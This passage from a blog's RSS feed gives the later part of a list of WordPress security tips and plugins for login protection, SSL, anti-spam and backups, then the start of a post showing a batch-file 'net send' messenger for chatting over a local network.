&lt;h3&gt;&lt;strong&gt;11. Change database table prefix&lt;/strong&gt;&lt;/h3&gt;The default prefix used by WordPress is “wp”. You can easily change  the prefix to other terms that are difficult to guess using the &lt;a href=&quot;http://wordpress.org/extend/plugins/wp-security-scan/&quot; target=&quot;_blank&quot;&gt;WP-Security-Scan&lt;/a&gt;. More detail on this plugin below.&lt;br /&gt;
&lt;h3&gt;12. Don’t use (or better yet, &lt;em&gt;remove&lt;/em&gt;)  the default “admin” username&lt;/h3&gt;When you install WordPress, it automatically generates a  user with Administrator-level permissions called &lt;strong&gt;admin&lt;/strong&gt;.  It is strongly recommended that you do not use this username to make it  harder for the hacker to guess your username and password via Brute  force  attacks. Even if you downgrade its permission role, it’s still a &lt;em&gt;better idea&lt;/em&gt; just to remove this user  altogether.&lt;br /&gt;
You can use the &lt;a href=&quot;http://wordpress.org/extend/plugins/wpvn-username-changer/&quot; target=&quot;_blank&quot; title=&quot;Download Change Username&quot;&gt;Change Username Plugin&lt;/a&gt; to change the Username of Admin Account.&lt;br /&gt;
&lt;/div&gt;&lt;hr /&gt; &lt;h2&gt;Security Plugins&lt;/h2&gt;&lt;hr /&gt; &lt;div style=&quot;margin-top: 20px;&quot;&gt; &lt;h3&gt;&lt;strong&gt;13. Secure WordPress&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/secure-wordpress/&quot; target=&quot;_blank&quot; title=&quot;Download Secure WordPress&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://bueltge.de/wordpress-login-sicherheit-plugin/652/&quot; target=&quot;_blank&quot; title=&quot;Plugin HomePage&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
It will help secure WordPress installation by&lt;strong&gt; removing miscellaneous items&lt;/strong&gt;  after the installation process which may aid hackers. It will remove  error information from the login-page and also remove or change the  WP-version data but leave it unchanged in the admin area. It is  suggested to remove any unwanted information to the non-admin for  security reasons so it will remove update information about plugins,  themes and core update information. Secure WordPress will add a &lt;strong&gt;blank index.html&lt;/strong&gt;  to the plug-in directory such that if anyone is trying to view the  contents of the directory they will be viewing a blank page instead of  the contents.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;14. Force SSL&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/force-ssl/&quot; target=&quot;_blank&quot; title=&quot;Download Force SSL&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.almosteffortless.com/wordpress/force-ssl/&quot; target=&quot;_blank&quot; title=&quot;Plugin HomePage&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
Having a secure SSL connection to communicate with your users is  beneficial. To enable this, your site must be SSL enabled first. To  implement this, you need to buy the SSL certificate. By installing this  plug-in it will force your user browser to connect to your site via a &lt;strong&gt;SSL connection&lt;/strong&gt;.  This eliminates any third party attacks between the connection and all  the data that is transmitted to and from the site will be encrypted for  better security.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;15. Chap Secure Login&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/chap-secure-login/&quot; target=&quot;_blank&quot; title=&quot;Download Chap Secure Login&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.redsend.org/chapsecurelogin/&quot; target=&quot;_blank&quot; title=&quot;Plugin HomePage&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
If you are not having a secure connection like SSL to protect your password , then you can use this plug-in for &lt;strong&gt;encrypting passwords&lt;/strong&gt;.  It will use the Chap protocol to hide the passwords and transmit it  encrypted. The only information that is transmitted unencrypted is your  username. Protecting password will give full security because password  leaks will enable the hacker the gain full control of your WordPress  blog.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;16. HTTP Authentication&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/http-authentication/&quot; target=&quot;_blank&quot; title=&quot;Download HTTP Authentication&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://dev.webadmin.ufl.edu/%7Edwc/2008/04/16/http-authentication-20/&quot; target=&quot;_blank&quot; title=&quot;Plugin HomePage&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
The HTTP Authentication plugin allows you to use existing means of  authenticating users for WordPress. This includes Apache’s basic HTTP  authentication module and many others.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;17. Anonymous WordPress Plugin&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/anonymous-wordpress-plugin-updates/&quot; target=&quot;_blank&quot; title=&quot;Download Anonymous WordPress Plugin&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://f00f.de/blog/2007/10/02/plugin-anonymous-wordpress-plugin-updates.html&quot; target=&quot;_blank&quot; title=&quot;Plugin HomePage&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
All the WordPress versions 2.3 and above have the feature to get &lt;strong&gt;automatic updates for plugins&lt;/strong&gt;.  During this process it will send some of your information like your  blog’s URL, version number, list of installed plugins and activated  plugins to WordPress.org. This information could be of potential use for  hackers. So to avoid this, installing Anonymous WordPress plug-in is a  feasible option. It will &lt;strong&gt;strip off your blog’s URL and version number&lt;/strong&gt; and empty the activated plugins list. This plug-in is compatible with WordPress 2.3 and above.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;18. Login Encrypt&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/login-encryption/&quot; target=&quot;_blank&quot; title=&quot;Download Login Encrypt&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.elserver.com/&quot; target=&quot;_blank&quot; title=&quot;Plugin HomePage&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
This will help&lt;strong&gt; encrypt the login information&lt;/strong&gt; using  the complex DES and RSA combination. It uses the JavaScript appended and  encrypted the password of the user and generates a unique DES key. And  by using this key, user can have secure login each time they login to  your blog.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;19. Admin SSL&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/admin-ssl-secure-admin/&quot; target=&quot;_blank&quot; title=&quot;Download Admin SSL&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.kerrins.co.uk/blog/admin-ssl/&quot; target=&quot;_blank&quot; title=&quot;Plugin HomePage&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
This plug-in will work with both the private and shared SSL connections and it will &lt;strong&gt;force a SSL connection&lt;/strong&gt;  in every page where password can or has to be entered. It is very  helpful to protect the admin area, posts and all the pages of your  WordPress installation and secure the login page. This plug-in works on  WordPress 2.2 to 2.7.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;20. AskApache Password Protect&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/askapache-password-protect/&quot; target=&quot;_blank&quot; title=&quot;Download AskApache Password Protect&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.askapache.com/htaccess/htaccess-security-block-spam-hackers.html&quot; target=&quot;_blank&quot; title=&quot;Plugin HomePage&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
It will &lt;strong&gt;block the bots&lt;/strong&gt; and creates a safe wall for  any vulnerability your WordPress blog may have. It will protect your  password as well as your WordPress directories like the wp-includes,  wp-content, etc. It is like placing your WordPress blog behind a  security wall.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;21. TAC (Theme Authenticity Checker)&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/tac/&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://builtbackwards.com/projects/tac/&quot; target=&quot;_blank&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
TAC stands for Theme Authenticity Checker. Currently, TAC searches  the source files of every installed theme for signs of malicious code.  If such code is found, TAC displays the path to the theme file, the line  number, and a small snippet of the suspect code. As of v1.3 TAC also  searches for and displays static links.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;22. Invisible Defender&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/invisible-defender/&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.poradnik-webmastera.com/projekty/invisible_defender/&quot; target=&quot;_blank&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
This plugin protects registration, login and comment forms from  spambots by adding two extra fields hidden by CSS. This approach gave me  100% anti-spam protection on one of my sites.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;23. Semisecure Login Reimagined&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/semisecure-login-reimagined/&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://moggy.laceous.com/2009/06/11/semisecure-login-reimagined-v2/&quot; target=&quot;_blank&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
Semisecure Login Reimagined increases the security of the login  process using an RSA public-key to encrypt the password on the  client-side when a user logs in. The server side then decrypts the  encrypted password with the private key. JavaScript is required to  enable encryption. It is most useful for situations where SSL is not  available, but the administrator wishes to have some additional security  measures in place without sacrificing convenience.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;24. Stealth Login&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/stealth-login/&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.skullbit.com/&quot; target=&quot;_blank&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
This plugin allows you to create custom URLs for logging in, logging  out, administration and registering for your WordPress blog. Instead of  advertising your login url on your homepage, you can create a url of  your choice that can be easier to remember than wp-login.php, for  example you could set your login url to http://www.myblog.com/login for  an easy way to login to your website.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;25. WordPress File Monitor&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/wordpress-file-monitor/&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://mattwalters.net/projects/wordpress-file-monitor/&quot; target=&quot;_blank&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
Monitors your WordPress installation for added/deleted/changed files.  When a change is detected an email alert can be sent to a specified  address.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;26. WordPress Firewall Plugin&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://www.seoegghead.com/software/downloads/wordpress-firewall.seo&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.seoegghead.com/software/wordpress-firewall.seo&quot; target=&quot;_blank&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
This WordPress plugin investigates web requests with simple  WordPress-specific heuristics to identify and stop most obvious attacks.  There exist a few powerful generic modules that do this; but they’re  not always installed on web servers, and difficult to configure.&lt;br /&gt;
It intelligently whitelists and blacklists pathological-looking  phrases based on which field they appear within in a page request  (unknown/numeric parameters vs. known post bodies, comment bodies, etc.)&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;27. WordPress Guard Plugin&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://taragana.com/products/free-wordpress-plugins/wordpress-guard-plugin/&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://taragana.com/products/free-wordpress-plugins/wordpress-guard-plugin/&quot; target=&quot;_blank&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
Angsuman’s WordPress Guard Plugin is a must-have WordPress security  plugin that protects the vulnerable areas of your blog from outside  access with an additional layer of security.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;28. WP-Dephorm&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/wp-dephorm/&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://dev.squarecows.com/projects/wp-dephorm&quot; target=&quot;_blank&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
wp-dephorm protects your users from the prying eyes of phorm. This is  achieved by setting a cookie to opt out of the phorm information  mining. Your blog viewers will not have their information stored and  used in marketing campaigns whilst viewing your site.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;29. WP Security Scan&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/wp-security-scan/&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://semperfiwebdesign.com/plugins/wp-security-scan/&quot; target=&quot;_blank&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
Scans your WordPress installation for security vulnerabilities and suggests corrective actions.&lt;br /&gt;
-passwords&lt;br /&gt;
-file permissions&lt;br /&gt;
-database security&lt;br /&gt;
-version hiding&lt;br /&gt;
-WordPress admin protection/security&lt;br /&gt;
-removes WP Generator META tag from core code&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;30. AntiVirus&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/antivirus/&quot; target=&quot;_blank&quot; title=&quot;Download AntiVirus&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://wpantivirus.com/&quot; target=&quot;_blank&quot; title=&quot;Plugin HomePage&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
&lt;em&gt;AntiVirus for WordPress&lt;/em&gt; is a smart and effective solution to  protect your blog against exploits and spam injections. AntiVirus  protection for your blog.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;31. WordPress Exploit Scanner&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/exploit-scanner/&quot; target=&quot;_blank&quot; title=&quot;Download WordPress Exploit Scanner&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://ocaoimh.ie/exploit-scanner/&quot; target=&quot;_blank&quot; title=&quot;Plugin HomePage&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
This plugin searches the files on your website, and the posts and  comments tables of your database for anything suspicious. It also  examines your list of active plugins for unusual filenames.&lt;br /&gt;
It does not remove anything. That is left to the user to do.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;32. Paranoid911&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/paranoid911/&quot; target=&quot;_blank&quot; title=&quot;Download Paranoid911&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.jeka911.com/examples/paranoid911/&quot; target=&quot;_blank&quot; title=&quot;Plugin HomePage&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
Paranoid911 checks your wordpress installation for changes and sends you an  email when changes occur.&lt;br /&gt;
&lt;/div&gt;&lt;hr /&gt; &lt;h2&gt;AntiSpam Plugins&lt;/h2&gt;&lt;hr /&gt; &lt;div style=&quot;margin-top: 20px;&quot;&gt; &lt;h3&gt;33. Defensio Anti-Spam&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/defensio-anti-spam/&quot; target=&quot;_blank&quot; title=&quot;Download Defensio Anti-Spam&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://defensio.com/&quot; target=&quot;_blank&quot; title=&quot;Plugin HomePage&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
Defensio is an advanced spam filtering web service that learns and  adapts to your behaviors and those of your readers. Defensio aims to be  an all-in-one anti-spam solution.  Therefore, using it along with other  anti-spam plugins WILL cause problems.  PLEASE deactivate Akismet and  other similar plugins before activating Defensio.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;34. Simple Trackback Validation&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/simple-trackback-validation/&quot; target=&quot;_blank&quot; title=&quot;Download Simple Trackback Validation&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://sw-guide.de/wordpress/plugins/simple-trackback-validation/&quot; target=&quot;_blank&quot; title=&quot;Plugin HomePage&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
Simple Trackback Validation Plugin performs a simple but very  effective test on all incoming trackbacks in order to stop trackback  spam.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;35. NoSpamNX&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/nospamnx/&quot; target=&quot;_blank&quot; title=&quot;Download NoSpamNX&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.svenkubiak.de/nospamnx-en&quot; target=&quot;_blank&quot; title=&quot;Plugin HomePage&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
NoSpamNX is the successor of Yawasp (Yet Another WordPress antispam  plugin) and is a plugin to protect against automated comment spam  (spambots). While Yawasp changed the names of the form fields in the  comment template, NoSpamNX works without these modifications, but is  equally effective. By eliminating the need for modifications within the  form field maximum compatibility with other WordPress plugins or  browsers is ensured.&lt;br /&gt;
When calling the comment form NoSpamNX adds extra fields (hidden before  the “normal” user) automatically to your comment template. When a  comment is saved, these fields are checked. For additional protection,  the order and the values of these fields change periodically, so that no  spambot can adapt to a specific blog adapt.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;36. SI CAPTCHA Anti-Spam&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/si-captcha-for-wordpress/&quot; target=&quot;_blank&quot; title=&quot;Download SI CAPTCHA Anti-Spam&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.642weather.com/weather/scripts-wordpress-captcha.php&quot; target=&quot;_blank&quot; title=&quot;Plugin HomePage&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
SI CAPTCHA adds CAPTCHA anti-spam methods to WordPress on the comment  form, registration form, or both. In order to post comments, users will  have to type in the phrase shown on the image. This prevents spam from  automated bots. It works great with Akismet.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;37. AntiSpam Bee&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/antispam-bee/&quot; target=&quot;_blank&quot; title=&quot;Download AntiSpam Bee&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://antispambee.com/&quot; target=&quot;_blank&quot; title=&quot;Plugin HomePage&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
AntispamBee protects blogs from digital rubbish. It is made up of  sophisticated techniques and analyzes comments including pings. Also,  for reasons of data privacy, the use of AntispamBee is a safe solution,  as it is anonymous and registration-free.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;38. Akismet&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/akismet/&quot; target=&quot;_blank&quot; title=&quot;Download Akismet&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://akismet.com/&quot; target=&quot;_blank&quot; title=&quot;Plugin HomePage&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
Akismet is quite possibly the most important and useful plugin you  will ever install. It has been developed by the actual team behind  WordPress, if that is not enough of a seal of of approval and a  guarantee, I don’t know what is.&lt;br /&gt;
In a nutshell, Akismet checks your comments against the Akismet web  service to see if they look like spam or not and lets you review the  spam it catches under your blog’s “Comments” admin screen.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;39. WP-reCAPTCHA&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/wp-recaptcha/&quot; target=&quot;_blank&quot; title=&quot;Download WP-reCAPTCHA&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.blaenkdenum.com/wp-recaptcha/&quot; target=&quot;_blank&quot; title=&quot;Plugin HomePage&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
The reCAPTCHA plugin is one you’ve probably seen around on sites such  as Facebook, Twitter and StumbleUpon. It isn’t just your average  CAPTCHA (an image containing some letters that are designed so only  humans can read them), it uses words from old books, so every time you  enter a reCAPTCHA, you’re helping digitise books. At this point, you’re  probably thinking but if I’m telling it what the words mean, does that  mean I can enter anything? How does that stop spammers? The answer is  simple – there are two words, one of which the CAPTCHA knows. The  second, it doesn’t and you’re helping digitise it.&lt;br /&gt;
&lt;/div&gt;&lt;hr /&gt; &lt;h2&gt;Backup Plugins&lt;/h2&gt;&lt;hr /&gt; &lt;div style=&quot;margin-top: 20px;&quot;&gt; &lt;h3&gt;40. WordPress EZ Backup&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/wordpress-ez-backup/&quot; target=&quot;_blank&quot; title=&quot;Download WordPress EZ Backup&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://lastnightsdesigns.com/?page_id=121&quot; target=&quot;_blank&quot; title=&quot;Plugin HomePage&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
WordPress EZ Backup is A Administrators Plugin to allow the easiest  most feature rich method for creating Backup Archives of your entire  Site (not just WP Installations but Any part of your site or webspace)  &amp;amp; allows backup archives of any MySQL Database you choose &amp;amp; More&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;41. WordPress Database Backup&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/wp-db-backup/&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.ilfilosofo.com/blog/wp-db-backup&quot; target=&quot;_blank&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
WordPress database backup creates backups of your core WordPress  tables as well as other tables of your choice in the same database.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;42. WP-DBManager&lt;/strong&gt;&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/wp-dbmanager/&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://lesterchan.net/portfolio/programming/php/&quot; target=&quot;_blank&quot; title=&quot;Plugin HomePage&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
Allows you to optimize database, repair database, backup database,  restore database, delete backup database , drop/empty tables and run  selected queries. Supports automatic scheduling of backing up and  optimizing of database.&lt;br /&gt;
&lt;h3&gt;43. BackUpWordPress&lt;/h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/backupwordpress/&quot; target=&quot;_blank&quot; title=&quot;Download BackUpWordPress&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://wordpress.designpraxis.at/&quot; target=&quot;_blank&quot; title=&quot;Plugin HomePage&quot;&gt;Plugin HomePage&lt;/a&gt;&lt;br /&gt;
BackUpWordPress is a Backup &amp;amp; Recovery Suite for your WordPress  website. This Plugin allows you to backup database as well as files and  comes with a rich set of options.&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;</description><link>http://convex-coders.blogspot.com/2012/01/43-excellent-wordpress-security-tips.html</link><author>noreply@blogger.com (Convex Coders)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgljID7Lwut1kdKi_ggg1fvN8npk-JPOS2YMk_tOoc17uvpO417bqij8fUctc4K7n26vrIUtgFcBjvHPFF6v9V5n46d6iXmA3YTysVFxg0J5GRU4LzB4rZDzvOFIJLVt1l0yR5F9aGcC_g/s72-c/wp-security1.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5995707516009947483.post-5933548598383230096</guid><pubDate>Wed, 18 Jan 2012 15:28:00 +0000</pubDate><atom:updated>2012-01-18T20:58:51.101+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tips &#39;n&#39; Tricks</category><title>Chat with Friends through MS-DOS Command Prompt</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVZ8voinKwell1xCXDQWgmrdt9cD7zgeKzeipajIAHV-rMdOy_CMRatEt60tMtUWbTstzVxaPLOjEfXJzGx8i1GolYVseNYB1MAmiijDQcehir0XUQwqWRdNFm4MeTMkZis9Aql73Ac8U/s1600/MS-DOS.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVZ8voinKwell1xCXDQWgmrdt9cD7zgeKzeipajIAHV-rMdOy_CMRatEt60tMtUWbTstzVxaPLOjEfXJzGx8i1GolYVseNYB1MAmiijDQcehir0XUQwqWRdNFm4MeTMkZis9Aql73Ac8U/s200/MS-DOS.jpg&quot; width=&quot;168&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;All you need is your friend&#39;s I.P. Address and your Command Prompt.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Then Open Notepad and write this code as it is.....!&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;@echo off&lt;br /&gt;
:A&lt;br /&gt;
Cls&lt;br /&gt;
echo MESSENGER&lt;br /&gt;
set /p n=User:&lt;br /&gt;
set /p m=Message:&lt;br /&gt;
net send %n% %m%&lt;br /&gt;
Pause&lt;br /&gt;
Goto A &lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Now save this as &quot;Messenger.Bat&quot;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Open Command Prompt.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Drag this file (.bat file) over to Command Prompt and press Enter.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;You would then see something like this:&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdTkycJHHAoUdUPUbCS_-5VDFHMOsjJVWNvrKaUjO0m_8MKSZS_GDiif4wycigKivMOiFYp5VwSouOFLmkeFWvvYGTj94KQobjFBNPn2ZtwnYMZ5GTuUBAfpr52aX8QajoNuebNJGhun8/s1600/Chat+with+Friends+through+ms+dos+Command+Prompt..jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;337&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdTkycJHHAoUdUPUbCS_-5VDFHMOsjJVWNvrKaUjO0m_8MKSZS_GDiif4wycigKivMOiFYp5VwSouOFLmkeFWvvYGTj94KQobjFBNPn2ZtwnYMZ5GTuUBAfpr52aX8QajoNuebNJGhun8/s640/Chat+with+Friends+through+ms+dos+Command+Prompt..jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Now, type the I.P. Address of the computer you want to contact and &lt;b&gt;press enter&lt;/b&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Now all you need to do is type your message and press Enter.&lt;br /&gt;
&lt;b&gt;Start Chatting&lt;/b&gt;.......! &lt;/span&gt;&lt;/li&gt;
